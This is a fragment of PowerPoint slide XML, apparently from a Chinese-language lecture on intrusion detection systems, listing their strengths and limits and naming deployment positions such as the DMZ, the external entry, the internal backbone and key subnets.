          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34"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dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="002060"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>有效保护入侵证据</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="35" name="组合 34"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>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38" name="组合 37"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1908" y="7747"/>
              <a:ext cx="6016" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="6016" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3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不影响被保护主机的性能</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="40" name="组合 39"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>
              </a:xfrm>
            </p:grpSpPr>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="125" name="组合 124"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6605905" y="2323465"/>
            <a:ext cx="4132580" cy="3825875"/>
            <a:chOff x="10403" y="3659"/>
            <a:chExt cx="6508" cy="6025"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="57" name="组合 56"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="12792" y="3920"/>
              <a:ext cx="1761" cy="897"/>
              <a:chOff x="3792538" y="3152454"/>
              <a:chExt cx="1239837" cy="734063"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="60"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6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63" name="Text Box 24"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3860799" y="3293024"/>
                <a:ext cx="1109128" cy="59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sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="矩形: 剪去左右顶角 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10403" y="3659"/>
              <a:ext cx="6508" cy="6025"/>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67" name="组合 66"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10403" y="5052"/>
              <a:ext cx="5683" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="5683" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2049" y="8378"/>
                <a:ext cx="4738" cy="671"/>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在交换式网络环境难以配置</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="75" name="组合 74"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="76" name="图片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86" name="组合 85"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10405" y="5774"/>
              <a:ext cx="6016" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="6016" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="91"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检测性能受硬件限制</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="95" name="组合 94"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="96" name="图片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98" name="组合 97"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10405" y="6411"/>
              <a:ext cx="6016" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="6016" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9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不能处理加密后的数据</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="100" name="组合 99"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="101" name="图片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0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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05A18612-DFAE-4A20-92C6-04AA06BD3F6D}"/>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245742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D7A6DB2C-88FB-3808-A74A-B08CD060E3F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="3566795" cy="720000"/>
            <a:chOff x="3792538" y="3138472"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{698EB868-5B1B-E8BB-EB34-4A5483C7B4D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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3" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E39EF1C4-9A3B-2A81-427E-0689AB2B3E0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4" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37684E28-920E-9778-4559-882227F6DF46}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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的部署</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="77" name="Object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF383AE4-174A-73FA-592F-8B9D9870A45E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="582370339"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3722701" y="2597861"/>
          <a:ext cx="6892044" cy="3552114"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s2092" name="Visio" r:id="rId4" imgW="5099934" imgH="2639816" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId4" imgW="5099934" imgH="2639816" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="77" name="Object 3">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF383AE4-174A-73FA-592F-8B9D9870A45E}"/>
                          </a:ext>
                        </a:extLst>
                      </p:cNvPr>
                      <p:cNvPicPr>
                        <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                      </p:cNvPicPr>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId5"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr bwMode="auto">
                      <a:xfrm>
                        <a:off x="3722701" y="2597861"/>
                        <a:ext cx="6892044" cy="3552114"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:effectLst/>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Oval 4">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AC284BD-9A5F-CD29-895C-7AC2243020A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7949884" y="2468417"/>
            <a:ext cx="1733634" cy="1009838"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="571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6"/>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79" name="Oval 5">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B6AC3DA-BEAF-4373-E5C8-86316A0F9840}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9105899" y="4859402"/>
            <a:ext cx="1733633" cy="1009838"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="571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6"/>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0" name="Oval 6">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25762841-0FC9-C199-C044-35FE85A9614B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6199749" y="2472569"/>
            <a:ext cx="1733633" cy="1009837"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="571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6"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Oval 7">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CF4662E-A3FC-D8F8-6B4E-4FF77C11C488}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6045550" y="4860476"/>
            <a:ext cx="1733633" cy="1009838"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="571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6"/>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endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="83" name="组合 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCB29423-8DA7-B750-AC1A-FF74D02A9700}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="784985" y="2312233"/>
            <a:ext cx="9713845" cy="957580"/>
            <a:chOff x="1066" y="1921"/>
            <a:chExt cx="13336" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="84" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2207808-5FF6-4273-3366-8A11B3D5DCC9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2299" y="2105"/>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en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>DMZ</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>区</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="85" name="图片 84">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FFD2DFE-586D-0000-ABA2-D21FCB658A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 y="1921"/>
              <a:ext cx="1508" cy="1508"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F16EA6AE-0B52-0841-9962-3DF0950FCD0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1195578" y="2551775"/>
            <a:ext cx="248310" cy="426306"/>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nvGrpSpPr>
          <p:cNvPr id="88" name="组合 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE3F3358-87C8-0EE7-D4CA-997EB4F51B64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="795062" y="2973195"/>
            <a:ext cx="9713845" cy="957580"/>
            <a:chOff x="1066" y="1921"/>
            <a:chExt cx="13336" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="89" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B33BAFD-4250-73AA-870E-595E0CFF634B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2299" y="2105"/>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外网入口</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="90" name="图片 89">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0A0F4E5-53E7-3539-CAA1-F4EB21FE84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 y="1921"/>
              <a:ext cx="1508" cy="1508"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="92" name="组合 91">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9554485-689B-E8F9-1CB6-D3B581BB0205}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="802218" y="3641426"/>
            <a:ext cx="9713845" cy="957580"/>
            <a:chOff x="1066" y="1921"/>
            <a:chExt cx="13336" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="93" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C12B764-C220-9281-F656-369BC3C924E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2299" y="2105"/>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内网主干</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="94" name="图片 93">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E570889A-DEEC-9ED7-9C52-3EC860242C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 y="1921"/>
              <a:ext cx="1508" cy="1508"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="103" name="组合 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12C75912-5597-CF30-1F73-94911087C74B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="805850" y="4281826"/>
            <a:ext cx="9713845" cy="957580"/>
            <a:chOff x="1066" y="1921"/>
            <a:chExt cx="13336" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA1726C2-E19D-AE6B-656C-88840B5A9F3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2299" y="2105"/>
              <a:ext cx="1210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kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>关键子网</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="106" name="图片 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{951F7D5E-055F-B7FF-97FB-6E36D97D57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 y="1921"/>
              <a:ext cx="1508" cy="1508"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33B95B9F-847C-EF48-1C3B-DEA2561D1878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1195578" y="3221071"/>
            <a:ext cx="248310" cy="426306"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3943BF2-B963-AED8-3969-A19AB05D608B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1210885" y="3879917"/>
            <a:ext cx="248310" cy="426306"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4C3CF99-53A8-B0ED-80E9-64CB76282F91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187032" y="4547830"/>
            <a:ext cx="248310" cy="426306"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E7242B4-56E6-45CE-B7C3-EAD9E0350968}"/>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367043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0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:anim calcmode="discrete" valueType="str">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="10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2" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1" fill="hold">
